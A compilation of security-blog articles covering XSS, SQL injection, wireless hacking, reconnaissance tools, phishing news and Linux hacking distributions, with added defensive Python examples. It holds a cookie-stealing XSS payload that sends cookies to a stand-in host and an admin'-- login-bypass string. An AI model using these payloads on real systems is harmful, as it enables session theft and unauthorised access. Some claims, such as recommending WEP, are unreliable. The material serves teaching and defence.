
How Do Hackers Hijack Websites And Browsers Using XSS

What is Cross Site Scripting (XSS)?

Cross site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. The payload is usually a combination of HTML and JavaScript supplied by the attacker, but XSS can also be used to deliver malicious downloads, plugins, or media content. In this case the hacker plants malicious links or script in the website or app.

If the app or website lacks proper data sanitization, the malicious link executes the attacker’s chosen code in the user’s browser.

As a result, the attacker can steal the user’s active session cookie. Here’s an example of such a payload:

<script>i=new Image();i.src='http://example.com/log.php?'+document.cookie+' '+document.location</script>

Because XSS allows untrusted users to execute code in the browsers of trusted users and to access some types of data, such as session cookies, hackers frequently obtain website credentials that give them full control over the site.

How does cross site scripting work?

Cross-site scripting works by manipulating a vulnerable website or application so that it returns malicious JavaScript to users; the attacker injects the code into a page the application serves.

Attackers can also carry out an attack by modifying a request sent to the application, so that the injected value comes back in the response.

While the payload is usually JavaScript, XSS can take place using any client-side language.

What does the attacker do with the credentials?

The attacker can do the following things:

  • Hijack a website and browser.
  • Capture the keystrokes of a user.
  • Redirect a user to a malicious website.
  • Run web browser-based exploits (e.g., crashing the browser).
  • Obtain the cookie information of a user who is logged into a website (thus compromising the victim’s account).

In some cases, the XSS attack leads to a complete compromise of the victim’s account. Attackers can trick users into entering credentials on a fake form, which provides all the information to the attacker.

What are the different types of XSS attacks?

Stored XSS:-

Takes place when the malicious payload is stored in a database. It is rendered to other users when the data is requested, if there is no output encoding or sanitization.

Reflected XSS:-

Reflected XSS is the simplest variety of cross-site scripting. It arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

DOM-based XSS:-

DOM-based XSS (also known as DOM XSS) arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.

How to prevent XSS vulnerability?

There are some strategies to prevent XSS attacks:

  • Never trust user input.
  • Implement output encoding.
  • Perform user input validation.
  • Follow the defense in depth principle.
  • Ensure that web application development aligns with OWASP’s XSS Prevention Cheat Sheet.
  • After remediation, perform penetration testing to confirm it was successful.

Protect your organization by following secure development guidelines—building security in at all phases of the application’s development. Output encoding is also key to preventing XSS vulnerabilities. Make use of output encoding libraries that are relevant to the programming languages and frameworks your organization uses. Also, ensure your developers stay up-to-date with XSS prevention best practices.
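To make the output-encoding advice concrete, here is an added example (not code from the original post) that renders the cookie-stealing payload quoted earlier through a vulnerable template and through a hardened one. The function names, the sample comment and the link helper are constructed for illustration; the encoding itself uses Python’s standard library html.escape and urllib.parse.quote.

```python
import html
from urllib.parse import quote

# Constructed sample input: a stored comment carrying the kind of payload shown in the post.
UNTRUSTED_COMMENT = (
    "<script>i=new Image();i.src='http://example.com/log.php?'"
    "+document.cookie+' '+document.location</script>"
)


def render_comment_unsafe(comment: str) -> str:
    """'Before' version: untrusted text is concatenated straight into the HTML
    response, so any markup inside it is interpreted by the browser (stored XSS)."""
    return '<div class="comment">' + comment + "</div>"


def render_comment_safe(comment: str) -> str:
    """Hardened version: contextual output encoding for an HTML text node.
    html.escape(quote=True) turns < > & " ' into entities, so the browser shows
    the payload as literal text instead of executing it."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


def render_link_safe(display_text: str, query_value: str) -> str:
    """Encoding is context dependent: a value embedded in a URL component is
    URL-encoded first, and the whole attribute value is then HTML-encoded.
    (Hypothetical /search endpoint used only for illustration.)"""
    href = "/search?q=" + quote(query_value, safe="")
    return (
        '<a href="' + html.escape(href, quote=True) + '">'
        + html.escape(display_text, quote=True)
        + "</a>"
    )


def contains_active_markup(rendered: str) -> bool:
    """Cheap regression check for a test suite: a raw '<script' in the rendered
    output means untrusted input reached the page as markup rather than text."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print("unsafe :", render_comment_unsafe(UNTRUSTED_COMMENT))
    print("safe   :", render_comment_safe(UNTRUSTED_COMMENT))
    print("link   :", render_link_safe('a"b', "x y"))
```

The check in contains_active_markup is deliberately crude; it is meant as a smoke test that the encoding layer is actually in the render path, not as a replacement for encoding. Input validation (the second bullet above) still belongs in front of it.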

How Hackers Leak Databases | SQL Injection Vulnerability

What is SQL injection?

The Wikipedia article on SQL injection reads:

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution.

SQL injection is a web-based attack used by hackers to steal sensitive information from organizations through web applications. It is one of the most common application-layer attacks used today. It takes advantage of improper coding of web applications, which allows hackers to exploit the vulnerability by injecting SQL commands through the web application’s input fields.

The underlying fact that allows for SQL injection is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, consider a web application that implements a form-based login mechanism, stores the user credentials, and performs a simple SQL query to validate each login attempt.

Here is a typical example:

select * from users where username='admin' and password='admin123';

If the attacker knows that the username of the application administrator is admin, he can log in as admin without supplying any password by entering the following as the username:

admin'--

The query in the back end then looks like:

select * from users where username='admin'--' and password='xxx';

Note that the comment sequence (--) causes the rest of the query to be ignored, so the query executed is equivalent to:

select * from users where username='admin';

So the password check is bypassed.
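The following added example (not from the original post) reproduces the login query above against a constructed in-memory SQLite table, first built by string concatenation as the post shows, then with a parameterized query, so the difference in behaviour for the admin'-- input can be observed directly. The table contents and function names are constructed for the illustration; sqlite3 is Python’s standard-library driver.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the application's back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'admin123')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """'Before': the SQL text is assembled from user input, exactly as in the post.
    A username of admin'-- turns the password clause into a comment."""
    query = (
        "SELECT * FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    return conn.execute(query).fetchone()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """'After': placeholders hand the values to the driver separately from the SQL text,
    so quote characters and comment sequences in the input are just data."""
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, real creds :", login_vulnerable(db, "admin", "admin123"))
    print("vulnerable, admin'--   :", login_vulnerable(db, "admin'--", "xxx"))
    print("parameterized, admin'--:", login_parameterized(db, "admin'--", "xxx"))
```

Note that the parameterized version still authenticates the real credentials; it simply stops treating the input as part of the query grammar. Storing passwords in plaintext, as this minimal table does, is a separate defect the post does not address.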

Wireless Hacking Basic Knowledge

Wireless Network Sniffing :-

Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill, as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

Stations and Access Points :-

A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

Passive Scanning :-

Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

Channels :-

The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

Wired Equivalent Privacy (WEP) :-

It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

Detection of SSID :-

The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning.

Collecting the Frames for Cracking WEP :-

The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames. An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

Detection of the Sniffers :-

Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

Wireless Spoofing :-

There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

Denial of Service :-

A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent and difficult to stop while ongoing, and the victim and its clients may not even detect the attacks. The duration of such a DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

MAC Address Spoofing :-

The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

IP spoofing :-

Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

Frame Spoofing :-

The attacker will inject frames that are valid but whose content is carefully spoofed.

Wireless Network Probing :-

The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

AP Weaknesses :-

APs have weaknesses that are due both to design mistakes and to their user interfaces.

Trojan AP :-

An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

War Driving :-

Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Jamming the Air Waves :-

A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4 GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal-to-noise ratio drops so low that the wireless LAN ceases to function.

Tips for Wireless Home Network Security

  • Change Default Administrator Passwords (and Usernames)
  • Turn on (Compatible) WPA / WEP Encryption
  • Change the Default SSID
  • Disable SSID Broadcast
  • Assign Static IP Addresses to Devices
  • Enable MAC Address Filtering
  • Turn Off the Network During Extended Periods of Non-Use
  • Position the Router or Access Point Safely

Information Gathering – First Step Of Hacking

What’s information gathering?

When it comes to getting a clear information gathering concept, the simplest way to define it would be the process of collecting information about something you are interested in. A practical example: gathering information with your eyes is called visual perception. In the same way, in the digital world, a lot of information can be gathered in different ways, not with your senses, but with several methods, tools and techniques.

Information gathering is a phase of penetration testing or ethical hacking in which hackers or attackers gather as much information as possible related to the target’s internal and external security architecture.

The details of any system help the attacker identify the vulnerabilities within it, which can be exploited to gain access in later phases.

Deep knowledge about the target reduces the focus area and brings you closer to the target: the more information about the target, the more possibilities to win.

If you have enough of the required details about the target, you are close to getting the key to hacking it.

For example, you narrow down the target by means of the range of IP addresses you have to go through to hack it, or by its domain information, and so on.

What are the objectives of information gathering in cybersecurity?

Any basic cybersecurity information gathering process often includes these two types of data collection goals:

  • Collecting network data: Such as public, private and associated domain names, network hosts, public and private IP blocks, routing tables, TCP and UDP running services, SSL certificates, open ports and more.
  • Collecting system-related information: This includes user enumeration, system groups, OS hostnames, OS system type (probably by fingerprinting), system banners (as seen in the banner grabbing blog post), etc.

But there’s a lot more involved. Let’s learn about it, by exploring the most popular techniques used during this phase.

Information gathering techniques and methods

Ethical hackers use a wide variety of techniques and tools to get this precious information about their targets, as well as the locations and data collection software they’ll be using towards the information gathering goal.

Let’s look at the top information gathering methods used to gather information about any target.

How to gather information?

  • Social engineering: This includes in-person chat, phone conversations and email spoofing attacks. What all these methods have in common is the psychology of human weakness, needed to get maximum data about the target.
  • Search engines: Web crawlers can be used to fetch information about anything, and this includes companies, persons, services, and even real hacks, as seen in our previous article about Google Hacking.
  • Social networks: Facebook, Twitter, LinkedIn and other social networks are great sources of information to build a profile, especially when targeting individuals.
  • Domain names: These are registered by organizations, governments, public and private agencies, and people. Therefore, they’re a great starting point when you want to investigate someone. Personal information, associated domains, projects, services and technologies can be found by inspecting domain name information.
  • Internet servers: authoritative DNS servers are a great source of information, as they often include every single surface point exposed to the Internet—which means a direct link to related services such as HTTP, email, etc.

All these techniques are really useful when combined with enterprise security tools. Keep reading to discover how to maximize your information gathering results by using some really cool infosec utilities.

Information gathering tools

There are a lot of tools to discuss when talking about information gathering, including one particular software we can’t avoid mentioning… that’s Kali Linux, one of the most popular cyber security linux distributions around.

We’ve written about the top Kali Linux tools before, but that was a general review of the most popular tools on that Linux distro. When it comes to information gathering, Kali Linux includes one of the biggest collections ever. To be precise, exactly 67 information gathering utilities will help you get all the valuable data you need during your infosec investigations. Creating a full list of all the information gathering tools available would be monumental, not to mention difficult.

That’s why we’ve created a summary of the top 12 most popular tools that, in our experience, may help you during your information gathering process:

  • Nmap: Our beloved network scanner will be always in the #1 position when it comes to data gathering tools. It can be used not only to scan ports and service fingerprinting, but also as a DNS enumeration and network mapping tool.
  • Unicornscan: Combined with Nmap, it can give you the complete picture of any remote network or host, as it is able to perform asynchronous stateless TCP scanning with all variations of TCP flags, as well as TCP banner grabbing, async UDP Scanning, OS fingerprinting, and much more.
  • Sublist3r: This is one of the best subdomain enumeration tools around, one that will help you create a virtual subdomain map of any website in no time. By using Google dorks and other search engines such as Baidu, Ask, Yahoo or Bing, it can also be used to perform a brute force subdomain discovery attack with wordlists, thanks to its subroute integration.
  • DMitry: Its name stands for Deepmagic Information Gathering Tool, and is one of the top terminal-based tools when it comes to intel reconnaissance tasks. It will allow you to get any available data from any host, such as subdomains, email addresses, open ports, WHOIS lookups, server data, and more.
  • OWASP Amass: Also known simply as ‘Amass’, this information gathering tool helps researchers and IT administrators create a full map of their digital assets by providing an easy way to perform DNS enumeration, asset location, and overall attack surface discovery.
  • Axiom: This new tool is one of the best available when you need to get massive amounts of data in a limited time. It’s basically a dynamic infrastructure framework that helps system administrators and researchers build and deploy offensive and defensive security multi-cloud infrastructure in mere seconds, by using pre-installed tools based on OS images.
  • Th3inspector: This infosec utility will enable you to fetch all kinds of website-related information, such as page data, phone number, ip addresses of HTTP and email server, perform a domain WHOIS lookup, bypass the Cloudflare proxy, check the age of your domain name, scan remote active services, subdomain mapping, and even work as a CMS detector.
  • Devploit: This tool is used to extract DNS and domain data, including DNS lookups, WHOIS lookup information, reverse IP info, port scanning, DNS zone transfer, HTTP-headers, GEOIP lookup, subnet lookup, etc.
  • Bettercap: Known as the swiss army knife for networking, it’s used mostly for network recon and information gathering, especially for WiFi, Bluetooth low energy devices and Ethernet networks.
  • Traceroute: As one of the most popular network tools used to track the path of networks packets between one IP address to another, it’s a powerful recon tool that will let you gain critical network information about IP addresses and networking routes.
  • WHOIS: The WHOIS command is a great source of data for fetching domain- and IP-related information, including tech and admin names, telephones, addresses, country, DNS servers, etc.
  • Dig: Whenever you need to find current data about DNS records, Dig is one of the best tools there is to help you to accomplish that task, whether you want to get A, NS, TXT or CNAME records.

TODAYZOO PHISHING KIT USED TO SWIPE MICROSOFT CREDENTIALS

 Microsoft has detailed an unusual phishing campaign aimed at stealing passwords that uses a phishing kit built using pieces of code copied from other hackers’ work.

A “phishing kit” is the set of software or services designed to facilitate phishing attacks. In this case, the kit has been called TodayZoo by Microsoft after some text used by the kit. Microsoft also described it as a ‘Franken-Phish’ because it is made up of different elements, some available for sale through publicly accessible scam sellers or reused and repackaged by other kit resellers.

Microsoft said TodayZoo is using the WorkMail domain AwsApps[.]com to pump out email with links to phishing pages mimicking the Microsoft 365 login page.

Microsoft says the attackers have been creating malicious AWS WorkMail accounts “at scale” but are just using randomly generated domain names instead of names that would represent a legitimate company.

In other words, it’s a crude phishing product likely made on a thin budget, but large enough to be noticeable. It caught Microsoft’s attention because it impersonated Microsoft’s brand and used a technique called “zero-point font obfuscation” – HTML text with a zero font size in an email – to dodge human detection.

Microsoft detected an uptick in zero-font attacks in July. TodayZoo campaigns in April and May of this year typically impersonated Microsoft 365 login pages and a password-reset request. However, Microsoft found that campaigns in August used Xerox-branded fax and scanner notifications to dupe workers into giving up credentials.
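Zero-point font obfuscation is easy to reason about once you separate what a reader sees from what a text-based filter sees. The following added example (not part of the original article or Microsoft’s write-up) walks an HTML email body with Python’s standard-library html.parser and splits the text into visible and zero-size portions, which is the kind of check a mail-filtering pipeline can add. The sample message, the placeholder host name and the scanner class are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed sample: lure text interleaved with zero-size spans that carry filler a
# keyword filter would read but a human never sees. The link host is a placeholder.
SAMPLE_EMAIL_HTML = """
<html><body>
<p>Your Micro<span style="font-size:0px">quarterly report</span>soft 365 password expires today.</p>
<p style="FONT-SIZE: 0">lorem ipsum filler text</p>
<p>Click <a href="http://PLACEHOLDER-PHISH-HOST/login">here</a> to keep your account.</p>
</body></html>
"""

# Matches font-size declarations of zero in any unit (0, 0px, 0.0pt, 0%); a value such
# as 0.5em does not match because the fractional part is not all zeros.
ZERO_FONT_RE = re.compile(
    r"font-size\s*:\s*0(?:\.0+)?(?:px|pt|em|rem|%)?\s*(?:;|$)", re.IGNORECASE
)

# Elements that never have a closing tag; they must not push onto the nesting stack.
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link"}


class ZeroFontScanner(HTMLParser):
    """Tracks whether the current text node sits inside a zero-size element."""

    def __init__(self) -> None:
        super().__init__()
        self.stack: list[bool] = []      # one entry per open element: hidden or not
        self.hidden_text: list[str] = []
        self.visible_text: list[str] = []
        self.zero_font_elements = 0

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        style = dict(attrs).get("style") or ""
        hidden = bool(ZERO_FONT_RE.search(style))
        if hidden:
            self.zero_font_elements += 1
        self.stack.append(hidden)

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        if self.stack:
            self.stack.pop()

    def handle_data(self, data):
        text = data.strip()
        if not text:
            return
        # Text inherits zero size from any enclosing hidden element.
        (self.hidden_text if any(self.stack) else self.visible_text).append(text)


def scan_email(html_body: str) -> dict:
    """Return a summary suitable for a filter rule or an analyst's triage note."""
    scanner = ZeroFontScanner()
    scanner.feed(html_body)
    scanner.close()
    return {
        "zero_font_elements": scanner.zero_font_elements,
        "hidden_text": " ".join(scanner.hidden_text),
        "visible_text": " ".join(scanner.visible_text),
    }


if __name__ == "__main__":
    for key, value in scan_email(SAMPLE_EMAIL_HTML).items():
        print(f"{key}: {value}")
```

A filter that scores the message on the visible text alone sees the Microsoft 365 password lure intact, while the hidden text is a separate signal in its own right: legitimate mail rarely carries zero-size content at all, so a non-zero count is a reasonable trigger for closer inspection.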

Microsoft’s threat researchers have found that most of the phishing landing pages were hosted within cloud provider DigitalOcean.

Those pages were identical to the Microsoft 365 sign-in page. Another unusual trait was that after harvesting credentials, the stolen information was not forwarded to other email accounts but stored on the site itself. This behaviour was a trait of the TodayZoo phishing kit, which has previously focussed on phishing credentials from Zoom video-meeting accounts.

But Microsoft researchers believe this phishing group is a single operation rather than a network of agents.

“While many phishing kits are attributed to a wide variety of email campaign patterns and, conversely, many email campaign patterns are associated with many phishing kits, TodayZoo-based pages exclusively utilized the same email campaign patterns, and any of those subsequent email campaigns only surfaced TodayZoo kits.

These lead us to believe that the actors behind this specific TodayZoo implementation are operating on their own,” Microsoft said. Microsoft says it informed Amazon about the TodayZoo phishing campaign and that AWS “promptly took action”.

Google Tracking 270 State-Sponsored Hacker Groups From Over 50 Countries

Google’s Threat Analysis Group (TAG) on Thursday said it’s tracking more than 270 government-backed threat actors from more than 50 countries, adding that it has sent approximately 50,000 alerts of state-sponsored phishing or malware attempts to customers since the start of 2021.

The warnings mark a 33% increase from 2020, the internet giant said, with the spike largely stemming from “blocking an unusually large campaign from a Russian actor known as APT28 or Fancy Bear.”

Additionally, Google said it disrupted a number of campaigns mounted by an Iranian state-sponsored attacker group tracked as APT35 (aka Charming Kitten, Phosphorous, or Newscaster), including a sophisticated social engineering attack dubbed “Operation SpoofedScholars” aimed at think tanks, journalists, and professors with an aim to solicit sensitive information by masquerading as scholars with the University of London’s School of Oriental and African Studies (SOAS).


Details of the attack were first publicly documented by enterprise security firm Proofpoint in July 2021. Other past attacks involved the use of a spyware-infested VPN app uploaded to the Google Play Store that, when installed, could be leveraged to siphon sensitive information such as call logs, text messages, contacts, and location data from the infected devices.

Furthermore, an unusual tactic adopted by APT35 concerned the use of Telegram to notify the attackers when phishing sites under their control have been visited in real-time via malicious JavaScript embedded into the pages. The threat actor is also said to have impersonated policy officials by sending “non-malicious first contact email messages” modeled around the Munich Security and Think-20 (T20) Italy conferences as part of a phishing campaign to lure high-profile individuals into visiting rogue websites.

“For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government,” Google TAG’s Ajax Bash said.

Why Hackers Use Linux? And Popular Linux Operating Systems.

Why do Hackers use Linux :

The Linux operating system has amazing features that make it more dominant than others. It is an open source operating system descended from its predecessor, UNIX.

Because of its many benefits over any other OS, hackers prefer to use Linux. Other operating systems are friendlier to use, but Linux has many special features that make it more dominant than others.

Hackers are those who want to earn through their hacking capabilities; they break into computer systems or networks and hack them for profit.

Hackers always want to test their hacking capabilities, so they look for a more secure OS on which to perform their activities, and Linux is the best choice for them.

Low cost

Linux is an open source OS, so it is easily available on the internet, and the applications that run on it are free of cost. Hackers need not spend time and money buying licenses for Linux because most of the software comes under the General Public License. This is also one of the reasons why hackers use Linux.

Also, Linux is the only OS that does not need to be rebooted occasionally to improve its performance. You don’t need to restart it again and again to maintain its performance. It doesn’t slow down or freeze up due to memory leaks; a Linux system can be used for years without any problem.

Maintenance

Maintaining the Linux operating system is very easy, and software is easy to install. Linux is used for high-performance applications on servers, as well as for desktop applications and embedded systems.

Maintenance is easy because each distribution has its own software repository, in which you can easily search for software.

Command line and graphical user interface

Thanks to its strong and highly integrated command line interface, users get easier access to and control over their systems. The utilities built into Linux have greater functionality.

Linux is designed around a strong and highly integrated command line interface, which other OSes like Windows and macOS don’t have. Hackers and other users are allowed great access to their systems. Only Linux can work well even if the hard disk is full, which is impossible for other operating systems.

Open source

To develop software you need to know the system code: how to develop the code and how to modify it.

In Linux it is easy for you to learn the source code, because it is open and all the applications of this operating system are open source as well, which is a benefit. The Linux system can support the entire UNIX software package and all the files that are common to it.

Ease to Install and network friendly

Linux comes with a user-friendly installation, as most Linux distributions are user-friendly. These distributions come with tools that make installation easy, and the additional software is also very user friendly. Linux boots very fast compared to other operating systems.

Because it is open source and is contributed to by a team over internet networks, it is very easy to manage a network with it. Linux provides many libraries and commands that can be used to test network penetration. Because of the operating system’s reliability, it makes the network faster than any other operating system. This is also one of the reasons why hackers use Linux.

Multi-tasking and security

Linux is designed so that it can do many things at the same time: if a large printing job is running in the background, it will not slow down your work, and you can do much work without being disturbed by problems such as the system hanging or slow processing, as with other operating systems.

Linux is typically more secure compared to other operating systems. Hackers need a more secure system to perform their hacks, so most hackers use Linux for hacking. Windows is more popular among average users and also among programmers, because it is more profitable to write programs for Windows. So Linux is more secure than Windows, as fewer users use it.

Transparency

This is one of the main reasons why hackers use Linux. To carry out your hacks you must understand the operating system properly, to a large extent. You must have knowledge of the OS you are going to hack.

So for this you need a system without any loopholes. Linux is completely transparent, i.e. you can easily manipulate and watch the workings of Linux.

This is not the same with Windows. Microsoft lets you do only what Microsoft wants, whereas Linux was developed as an operating system that gives you more control over it rather than dictating what you can do.

You can control what you want to do which is basically necessary to hack a system.


So these were some of the features that make the Linux operating system the best choice among many hackers. Hacking has become an elite profession in the IT field.

This is because hacking requires detailed knowledge of IT concepts. So Linux is much required for hackers to hack. Linux is typically more secure compared to any other operating system, so pro hackers always want to work on an operating system that is more secure and also portable. Linux gives users infinite control over the system.

Due to its portability, users can easily write scripts in any scripting language. So you need not target the same operating system to show your hacking capabilities; Linux is universal, so you will not face any compatibility problems.

Acknowledging the above factors, hackers always want an operating system that provides maximum security to test their skills and meets their needs.

These are the main reasons Why do Hackers use Linux.

List Of Best Linux Operating Systems Usage In Hacking

Kali Linux

By far the most popular “hacking”/penetration testing Linux OS out there. (Link: https://www.kali.org/). Kali has a vast dimension of tools pre-installed and one can get up and running in a very short amount of time.

Parrot OS

Refined UI, lightweight footprint and expert support are some of the USPs of this distro. (Link: https://parrotlinux.org/). Dedicated CDNs mean lightning-fast downloads. Surfing the web privately has been made extremely easy on this OS.

BackBox

Based on Ubuntu, this OS consumes minimal resources and offers a simple and easy-to-use desktop manager (Link: https://www.backbox.org/). It has been specifically designed to reduce redundancies. Enables users to simulate attacks on applications or networks.

Black Arch

BlackArch Linux is an Arch Linux-based penetration testing distribution for penetration testers and security researchers. (Link: https://blackarch.org) The repository contains 2743 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.